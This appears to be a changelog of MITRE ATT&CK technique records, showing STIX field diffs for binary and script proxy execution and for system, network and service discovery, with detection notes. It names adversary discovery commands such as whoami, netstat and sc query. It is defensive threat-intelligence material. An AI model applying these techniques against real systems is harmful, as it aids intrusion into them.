| description | Adversaries may bypass process and/or signature-based defenses by proxying execution of malicious content with signed binaries. Binaries signed with trusted digital certificates can execute on Windows systems protected by digital signature validation. Several Microsoft signed binaries that are default on Windows installations can be used to proxy execution of other files. | Adversaries may bypass process and/or signature-based defenses by proxying execution of malicious content with signed, or otherwise trusted, binaries. Binaries used in this technique are often Microsoft-signed files, indicating that they have been either downloaded from Microsoft or are already native in the operating system.(Citation: LOLBAS Project) Binaries signed with trusted digital certificates can typically execute on Windows systems protected by digital signature validation. Several Microsoft signed binaries that are default on Windows installations can be used to proxy execution of other files or commands.
Similarly, on Linux systems adversaries may abuse trusted binaries such as split to proxy execution of malicious commands.(Citation: split man page)(Citation: GTFO split) |
| x_mitre_data_sources[0] | Process: Process Creation | Windows Registry: Windows Registry Key Modification |
| x_mitre_data_sources[1] | File: File Creation | Command: Command Execution |
| x_mitre_data_sources[3] | Process: OS API Execution | Process: Process Creation |
| x_mitre_data_sources[4] | Command: Command Execution | File: File Creation |
| x_mitre_data_sources[5] | Windows Registry: Windows Registry Key Modification | Network Traffic: Network Connection Creation |
| x_mitre_data_sources[6] | Network Traffic: Network Connection Creation | Process: OS API Execution |
| x_mitre_version | 2.1 | 3.0 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'GTFO split', 'description': 'GTFOBins. (2020, November 13). split. Retrieved April 18, 2022.', 'url': 'https://gtfobins.github.io/gtfobins/split/'} | |
| external_references | {'source_name': 'LOLBAS Project', 'description': 'Oddvar Moe et al. (2022, February). Living Off The Land Binaries, Scripts and Libraries. Retrieved March 7, 2022.', 'url': 'https://github.com/LOLBAS-Project/LOLBAS#criteria'} | |
| external_references | {'source_name': 'split man page', 'description': 'Torbjorn Granlund, Richard M. Stallman. (2020, March null). split(1) — Linux manual page. Retrieved March 25, 2022.', 'url': 'https://man7.org/linux/man-pages/man1/split.1.html'} | |
| x_mitre_contributors | Wes Hurd | |
| x_mitre_platforms | Linux | |
| x_mitre_platforms | macOS |
| Old Description | New Description |
|---|---|
An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from [System Information Discovery](https://attack.mitre.org/techniques/T1082) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. Tools such as [Systeminfo](https://attack.mitre.org/software/S0096) can be used to gather detailed system information. If running with privileged access, a breakdown of system data can be gathered through the systemsetup configuration tool on macOS. As an example, adversaries with user-level access can execute the df -aH command to obtain currently mounted disks and associated freely available space. [System Information Discovery](https://attack.mitre.org/techniques/T1082) combined with information gathered from other forms of discovery and reconnaissance can drive payload development and concealment.(Citation: OSX.FairyTale)(Citation: 20 macOS Common Tools and Techniques) Infrastructure as a Service (IaaS) cloud providers such as AWS, GCP, and Azure allow access to instance and virtual machine information via APIs. Successful authenticated API calls can return data such as the operating system platform and status of a particular instance or the model view of a virtual machine.(Citation: Amazon Describe Instance)(Citation: Google Instances Resource)(Citation: Microsoft Virutal Machine API) |
An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from [System Information Discovery](https://attack.mitre.org/techniques/T1082) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tools such as [Systeminfo](https://attack.mitre.org/software/S0096) can be used to gather detailed system information. If running with privileged access, a breakdown of system data can be gathered through the systemsetup configuration tool on macOS. As an example, adversaries with user-level access can execute the df -aH command to obtain currently mounted disks and associated freely available space. Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to gather detailed system information (e.g. show version).(Citation: US-CERT-TA18-106A) [System Information Discovery](https://attack.mitre.org/techniques/T1082) combined with information gathered from other forms of discovery and reconnaissance can drive payload development and concealment.(Citation: OSX.FairyTale)(Citation: 20 macOS Common Tools and Techniques)
Infrastructure as a Service (IaaS) cloud providers such as AWS, GCP, and Azure allow access to instance and virtual machine information via APIs. Successful authenticated API calls can return data such as the operating system platform and status of a particular instance or the model view of a virtual machine.(Citation: Amazon Describe Instance)(Citation: Google Instances Resource)(Citation: Microsoft Virutal Machine API) |
Dropped Detections:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| external_references | Amazon. (n.d.). describe-instance-information. Retrieved March 3, 2020. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User'] | |
| external_references | CAPEC-312 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-13 23:21:27.750000+00:00 | 2022-09-06 22:11:56.413000+00:00 |
| description | An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from [System Information Discovery](https://attack.mitre.org/techniques/T1082) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tools such as [Systeminfo](https://attack.mitre.org/software/S0096) can be used to gather detailed system information. If running with privileged access, a breakdown of system data can be gathered through the systemsetup configuration tool on macOS. As an example, adversaries with user-level access can execute the df -aH command to obtain currently mounted disks and associated freely available space. [System Information Discovery](https://attack.mitre.org/techniques/T1082) combined with information gathered from other forms of discovery and reconnaissance can drive payload development and concealment.(Citation: OSX.FairyTale)(Citation: 20 macOS Common Tools and Techniques)
Infrastructure as a Service (IaaS) cloud providers such as AWS, GCP, and Azure allow access to instance and virtual machine information via APIs. Successful authenticated API calls can return data such as the operating system platform and status of a particular instance or the model view of a virtual machine.(Citation: Amazon Describe Instance)(Citation: Google Instances Resource)(Citation: Microsoft Virutal Machine API) |
An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from [System Information Discovery](https://attack.mitre.org/techniques/T1082) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tools such as [Systeminfo](https://attack.mitre.org/software/S0096) can be used to gather detailed system information. If running with privileged access, a breakdown of system data can be gathered through the systemsetup configuration tool on macOS. As an example, adversaries with user-level access can execute the df -aH command to obtain currently mounted disks and associated freely available space. Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to gather detailed system information (e.g. show version).(Citation: US-CERT-TA18-106A) [System Information Discovery](https://attack.mitre.org/techniques/T1082) combined with information gathered from other forms of discovery and reconnaissance can drive payload development and concealment.(Citation: OSX.FairyTale)(Citation: 20 macOS Common Tools and Techniques)
Infrastructure as a Service (IaaS) cloud providers such as AWS, GCP, and Azure allow access to instance and virtual machine information via APIs. Successful authenticated API calls can return data such as the operating system platform and status of a particular instance or the model view of a virtual machine.(Citation: Amazon Describe Instance)(Citation: Google Instances Resource)(Citation: Microsoft Virutal Machine API) |
| external_references[1]['source_name'] | capec | Amazon Describe Instance |
| external_references[1]['url'] | https://capec.mitre.org/data/definitions/312.html | https://docs.aws.amazon.com/cli/latest/reference/ssm/describe-instance-information.html |
| external_references[2]['source_name'] | OSX.FairyTale | Google Instances Resource |
| external_references[2]['description'] | Phile Stokes. (2018, September 20). On the Trail of OSX.FairyTale | Adware Playing at Malware. Retrieved August 24, 2021. | Google. (n.d.). Rest Resource: instance. Retrieved March 3, 2020. |
| external_references[2]['url'] | https://www.sentinelone.com/blog/trail-osx-fairytale-adware-playing-malware/ | https://cloud.google.com/compute/docs/reference/rest/v1/instances |
| external_references[3]['source_name'] | 20 macOS Common Tools and Techniques | Microsoft Virutal Machine API |
| external_references[3]['description'] | Phil Stokes. (2021, February 16). 20 Common Tools & Techniques Used by macOS Threat Actors & Malware. Retrieved August 23, 2021. | Microsoft. (2019, March 1). Virtual Machines - Get. Retrieved October 8, 2019. |
| external_references[3]['url'] | https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/ | https://docs.microsoft.com/en-us/rest/api/compute/virtualmachines/get |
| external_references[4]['source_name'] | Amazon Describe Instance | 20 macOS Common Tools and Techniques |
| external_references[4]['description'] | Amazon. (n.d.). describe-instance-information. Retrieved March 3, 2020. | Phil Stokes. (2021, February 16). 20 Common Tools & Techniques Used by macOS Threat Actors & Malware. Retrieved August 23, 2021. |
| external_references[4]['url'] | https://docs.aws.amazon.com/cli/latest/reference/ssm/describe-instance-information.html | https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/ |
| external_references[5]['source_name'] | Google Instances Resource | OSX.FairyTale |
| external_references[5]['description'] | Google. (n.d.). Rest Resource: instance. Retrieved March 3, 2020. | Phile Stokes. (2018, September 20). On the Trail of OSX.FairyTale | Adware Playing at Malware. Retrieved August 24, 2021. |
| external_references[5]['url'] | https://cloud.google.com/compute/docs/reference/rest/v1/instances | https://www.sentinelone.com/blog/trail-osx-fairytale-adware-playing-malware/ |
| external_references[6]['source_name'] | Microsoft Virutal Machine API | US-CERT-TA18-106A |
| external_references[6]['description'] | Microsoft. (2019, March 1). Virtual Machines - Get. Retrieved October 8, 2019. | US-CERT. (2018, April 20). Alert (TA18-106A) Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved October 19, 2020. |
| external_references[6]['url'] | https://docs.microsoft.com/en-us/rest/api/compute/virtualmachines/get | https://www.us-cert.gov/ncas/alerts/TA18-106A |
| x_mitre_data_sources[0] | Instance: Instance Metadata | Process: OS API Execution |
| x_mitre_detection | System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001). In cloud-based systems, native logging can be used to identify access to certain APIs and dashboards that may contain system information. Depending on how the environment is used, that data alone may not be useful due to benign use during normal operations. | System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Further, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands may also be used to gather detailed system information with built-in features native to the network device platform. Monitor CLI activity for unexpected or unauthorized use commands being run by non-standard users from non-standard locations. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001). In cloud-based systems, native logging can be used to identify access to certain APIs and dashboards that may contain system information. Depending on how the environment is used, that data alone may not be useful due to benign use during normal operations. |
| x_mitre_version | 2.3 | 2.5 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/312.html', 'external_id': 'CAPEC-312'} | |
| x_mitre_contributors | Austin Clark, @c2defense | |
| x_mitre_platforms | Network |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Process: OS API Execution |
| Old Description | New Description |
|---|---|
| Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include [Arp](https://attack.mitre.org/software/S0099), [ipconfig](https://attack.mitre.org/software/S0100)/[ifconfig](https://attack.mitre.org/software/S0101), [nbtstat](https://attack.mitre.org/software/S0102), and [route](https://attack.mitre.org/software/S0103). Adversaries may use the information from [System Network Configuration Discovery](https://attack.mitre.org/techniques/T1016) during automated discovery to shape follow-on behaviors, including determining certain access within the target network and what actions to do next. | Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include [Arp](https://attack.mitre.org/software/S0099), [ipconfig](https://attack.mitre.org/software/S0100)/[ifconfig](https://attack.mitre.org/software/S0101), [nbtstat](https://attack.mitre.org/software/S0102), and [route](https://attack.mitre.org/software/S0103).
Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to gather information about configurations and settings, such as IP addresses of configured interfaces and static/dynamic routes (e.g. show ip route, show ip interface).(Citation: US-CERT-TA18-106A)(Citation: Mandiant APT41 Global Intrusion )
Adversaries may use the information from [System Network Configuration Discovery](https://attack.mitre.org/techniques/T1016) during automated discovery to shape follow-on behaviors, including determining certain access within the target network and what actions to do next. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_contributors | ['Austin Clark, @c2defense'] | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| external_references | Gyler, C.,Perez D.,Jones, S.,Miller, S.. (2021, February 25). This is Not a Test: APT41 Initiates Global Intrusion Campaign Using Multiple Exploits. Retrieved February 17, 2022. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User'] | |
| external_references | CAPEC-309 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-08 00:17:37.881000+00:00 | 2022-09-06 22:32:35.833000+00:00 |
| description | Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include [Arp](https://attack.mitre.org/software/S0099), [ipconfig](https://attack.mitre.org/software/S0100)/[ifconfig](https://attack.mitre.org/software/S0101), [nbtstat](https://attack.mitre.org/software/S0102), and [route](https://attack.mitre.org/software/S0103). Adversaries may use the information from [System Network Configuration Discovery](https://attack.mitre.org/techniques/T1016) during automated discovery to shape follow-on behaviors, including determining certain access within the target network and what actions to do next. | Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include [Arp](https://attack.mitre.org/software/S0099), [ipconfig](https://attack.mitre.org/software/S0100)/[ifconfig](https://attack.mitre.org/software/S0101), [nbtstat](https://attack.mitre.org/software/S0102), and [route](https://attack.mitre.org/software/S0103).
Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to gather information about configurations and settings, such as IP addresses of configured interfaces and static/dynamic routes (e.g. show ip route, show ip interface).(Citation: US-CERT-TA18-106A)(Citation: Mandiant APT41 Global Intrusion )
Adversaries may use the information from [System Network Configuration Discovery](https://attack.mitre.org/techniques/T1016) during automated discovery to shape follow-on behaviors, including determining certain access within the target network and what actions to do next. |
| external_references[1]['source_name'] | capec | Mandiant APT41 Global Intrusion |
| external_references[1]['url'] | https://capec.mitre.org/data/definitions/309.html | https://www.mandiant.com/resources/apt41-initiates-global-intrusion-campaign-using-multiple-exploits |
| x_mitre_data_sources[0] | Process: Process Creation | Command: Command Execution |
| x_mitre_data_sources[2] | Command: Command Execution | Process: Process Creation |
| x_mitre_detection | System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001). | System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Further, {{LinkById|T1059.008} commands may also be used to gather system and network information with built-in features native to the network device platform. Monitor CLI activity for unexpected or unauthorized use commands being run by non-standard users from non-standard locations. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001). |
| x_mitre_version | 1.3 | 1.5 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'US-CERT-TA18-106A', 'description': 'US-CERT. (2018, April 20). Alert (TA18-106A) Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved October 19, 2020.', 'url': 'https://www.us-cert.gov/ncas/alerts/TA18-106A'} | |
| external_references | {'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/309.html', 'external_id': 'CAPEC-309'} | |
| x_mitre_platforms | Network |
| Old Description | New Description |
|---|---|
Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network. An adversary who gains access to a system that is part of a cloud-based environment may map out Virtual Private Clouds or Virtual Networks in order to determine what systems and services are connected. The actions performed are likely the same types of discovery techniques depending on the operating system, but the resulting information may include details about the networked cloud environment relevant to the adversary's goals. Cloud providers may have different ways in which their virtual networks operate.(Citation: Amazon AWS VPC Guide)(Citation: Microsoft Azure Virtual Network Overview)(Citation: Google VPC Overview) Utilities and commands that acquire this information include [netstat](https://attack.mitre.org/software/S0104), "net use," and "net session" with [Net](https://attack.mitre.org/software/S0039). In Mac and Linux, [netstat](https://attack.mitre.org/software/S0104) and lsof can be used to list current connections. who -a and w can be used to show which users are currently logged in, similar to "net session". |
Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.
An adversary who gains access to a system that is part of a cloud-based environment may map out Virtual Private Clouds or Virtual Networks in order to determine what systems and services are connected. The actions performed are likely the same types of discovery techniques depending on the operating system, but the resulting information may include details about the networked cloud environment relevant to the adversary's goals. Cloud providers may have different ways in which their virtual networks operate.(Citation: Amazon AWS VPC Guide)(Citation: Microsoft Azure Virtual Network Overview)(Citation: Google VPC Overview) Similarly, adversaries who gain access to network devices may also perform similar discovery activities to gather information about connected systems and services.
Utilities and commands that acquire this information include [netstat](https://attack.mitre.org/software/S0104), "net use," and "net session" with [Net](https://attack.mitre.org/software/S0039). In Mac and Linux, [netstat](https://attack.mitre.org/software/S0104) and lsof can be used to list current connections. who -a and w can be used to show which users are currently logged in, similar to "net session". Additionally, built-in features native to network devices and [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) may be used (e.g. show ip sockets, show tcp brief).(Citation: US-CERT-TA18-106A) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User', 'Administrator'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-03-08 10:33:01.083000+00:00 | 2022-09-06 22:35:34.231000+00:00 |
| description | Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.
An adversary who gains access to a system that is part of a cloud-based environment may map out Virtual Private Clouds or Virtual Networks in order to determine what systems and services are connected. The actions performed are likely the same types of discovery techniques depending on the operating system, but the resulting information may include details about the networked cloud environment relevant to the adversary's goals. Cloud providers may have different ways in which their virtual networks operate.(Citation: Amazon AWS VPC Guide)(Citation: Microsoft Azure Virtual Network Overview)(Citation: Google VPC Overview)
Utilities and commands that acquire this information include [netstat](https://attack.mitre.org/software/S0104), "net use," and "net session" with [Net](https://attack.mitre.org/software/S0039). In Mac and Linux, [netstat](https://attack.mitre.org/software/S0104) and lsof can be used to list current connections. who -a and w can be used to show which users are currently logged in, similar to "net session". |
Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.
An adversary who gains access to a system that is part of a cloud-based environment may map out Virtual Private Clouds or Virtual Networks in order to determine what systems and services are connected. The actions performed are likely the same types of discovery techniques depending on the operating system, but the resulting information may include details about the networked cloud environment relevant to the adversary's goals. Cloud providers may have different ways in which their virtual networks operate.(Citation: Amazon AWS VPC Guide)(Citation: Microsoft Azure Virtual Network Overview)(Citation: Google VPC Overview) Similarly, adversaries who gain access to network devices may also perform similar discovery activities to gather information about connected systems and services.
Utilities and commands that acquire this information include [netstat](https://attack.mitre.org/software/S0104), "net use," and "net session" with [Net](https://attack.mitre.org/software/S0039). In Mac and Linux, [netstat](https://attack.mitre.org/software/S0104) and lsof can be used to list current connections. who -a and w can be used to show which users are currently logged in, similar to "net session". Additionally, built-in features native to network devices and [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) may be used (e.g. show ip sockets, show tcp brief).(Citation: US-CERT-TA18-106A) |
| x_mitre_detection | System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001). | System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Further, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands may also be used to gather system and network information with built-in features native to the network device platform. Monitor CLI activity for unexpected or unauthorized use commands being run by non-standard users from non-standard locations. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001). |
| x_mitre_version | 2.2 | 2.4 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'US-CERT-TA18-106A', 'description': 'US-CERT. (2018, April 20). Alert (TA18-106A) Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved October 19, 2020.', 'url': 'https://www.us-cert.gov/ncas/alerts/TA18-106A'} | |
| x_mitre_contributors | Austin Clark, @c2defense | |
| x_mitre_data_sources | Process: Process Creation | |
| x_mitre_platforms | Network |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Process: Process Creation |
| Description |
|---|
Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Various utilities and commands may acquire this information, including whoami. In macOS and Linux, the currently logged in user can be identified with w and who. On macOS the dscl . list /Users | grep -v '_' command can also be used to enumerate user accounts. Environment variables, such as %USERNAME% and $USER, may also be used to access this information. |
New Detections:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User', 'Administrator'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-08-12 13:34:34.153000+00:00 | 2022-04-20 19:04:03.271000+00:00 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Windows Registry: Windows Registry Key Access | |
| x_mitre_data_sources | Process: Process Access | |
| x_mitre_data_sources | Network Traffic: Network Traffic Flow | |
| x_mitre_data_sources | File: File Access | |
| x_mitre_data_sources | Process: OS API Execution | |
| x_mitre_data_sources | Active Directory: Active Directory Object Access | |
| x_mitre_data_sources | Network Traffic: Network Traffic Content |
| Old Description | New Description |
|---|---|
| Adversaries may use scripts signed with trusted certificates to proxy execution of malicious files. Several Microsoft signed scripts that are default on Windows installations can be used to proxy execution of other files. This behavior may be abused by adversaries to execute malicious files that could bypass application control and signature validation on systems.(Citation: GitHub Ultimate AppLocker Bypass List) | Adversaries may use trusted scripts, often signed with certificates, to proxy the execution of malicious files. Several Microsoft signed scripts that have been downloaded from Microsoft or are default on Windows installations can be used to proxy execution of other files.(Citation: LOLBAS Project) This behavior may be abused by adversaries to execute malicious files that could bypass application control and signature validation on systems.(Citation: GitHub Ultimate AppLocker Bypass List) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-09-01 00:57:01.576000+00:00 | 2022-04-18 14:43:46.045000+00:00 |
| name | Signed Script Proxy Execution | System Script Proxy Execution |
| description | Adversaries may use scripts signed with trusted certificates to proxy execution of malicious files. Several Microsoft signed scripts that are default on Windows installations can be used to proxy execution of other files. This behavior may be abused by adversaries to execute malicious files that could bypass application control and signature validation on systems.(Citation: GitHub Ultimate AppLocker Bypass List) | Adversaries may use trusted scripts, often signed with certificates, to proxy the execution of malicious files. Several Microsoft signed scripts that have been downloaded from Microsoft or are default on Windows installations can be used to proxy execution of other files.(Citation: LOLBAS Project) This behavior may be abused by adversaries to execute malicious files that could bypass application control and signature validation on systems.(Citation: GitHub Ultimate AppLocker Bypass List) |
| x_mitre_version | 1.1 | 2.0 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'LOLBAS Project', 'description': 'Oddvar Moe et al. (2022, February). Living Off The Land Binaries, Scripts and Libraries. Retrieved March 7, 2022.', 'url': 'https://github.com/LOLBAS-Project/LOLBAS#criteria'} | |
| x_mitre_contributors | Wes Hurd | |
| x_mitre_data_sources | Process: Process Creation |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Process: Process Creation |
| Old Description | New Description |
|---|---|
| Adversaries may try to get information about registered services. Commands that may obtain information about services using operating system utilities are "sc," "tasklist /svc" using [Tasklist](https://attack.mitre.org/software/S0057), and "net start" using [Net](https://attack.mitre.org/software/S0039), but adversaries may also use other tools as well. Adversaries may use the information from [System Service Discovery](https://attack.mitre.org/techniques/T1007) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. | Adversaries may try to gather information about registered local system services. Adversaries may obtain information about services using tools as well as OS utility commands such as sc query, tasklist /svc, systemctl --type=service, and net start.
Adversaries may use the information from [System Service Discovery](https://attack.mitre.org/techniques/T1007) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. |
New Detections:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_contributors | ['Harshal Tupsamudre, Qualys'] | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User', 'Administrator', 'SYSTEM'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-17 14:10:36.992000+00:00 | 2022-07-15 13:35:54.740000+00:00 |
| description | Adversaries may try to get information about registered services. Commands that may obtain information about services using operating system utilities are "sc," "tasklist /svc" using [Tasklist](https://attack.mitre.org/software/S0057), and "net start" using [Net](https://attack.mitre.org/software/S0039), but adversaries may also use other tools as well. Adversaries may use the information from [System Service Discovery](https://attack.mitre.org/techniques/T1007) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. | Adversaries may try to gather information about registered local system services. Adversaries may obtain information about services using tools as well as OS utility commands such as sc query, tasklist /svc, systemctl --type=service, and net start.
Adversaries may use the information from [System Service Discovery](https://attack.mitre.org/techniques/T1007) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. |
| x_mitre_data_sources[0] | Process: Process Creation | Command: Command Execution |
| x_mitre_data_sources[1] | Command: Command Execution | Process: OS API Execution |
| x_mitre_version | 1.2 | 1.4 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Process: Process Creation | |
| x_mitre_platforms | Linux |
| Description |
|---|
| Adversaries may abuse system services or daemons to execute commands or programs. Adversaries can execute malicious content by interacting with or creating services either locally or remotely. Many services are set to run at boot, which can aid in achieving persistence ([Create or Modify System Process](https://attack.mitre.org/techniques/T1543)), but adversaries can also abuse services for one-time or temporary execution. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-15 18:40:23.888000+00:00 | 2022-03-22 17:29:46.189000+00:00 |
| x_mitre_data_sources[0] | Command: Command Execution | Windows Registry: Windows Registry Key Modification |
| x_mitre_data_sources[1] | Process: Process Creation | Command: Command Execution |
| x_mitre_data_sources[2] | Service: Service Creation | Process: Process Creation |
| x_mitre_data_sources[4] | Windows Registry: Windows Registry Key Modification | Service: Service Creation |
| x_mitre_version | 1.1 | 1.2 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_platforms | Linux |
| Old Description | New Description |
|---|---|
